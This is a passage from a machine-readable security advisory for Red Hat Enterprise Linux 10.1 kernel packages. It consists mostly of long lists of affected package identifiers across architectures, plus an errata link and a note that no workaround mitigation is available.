"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
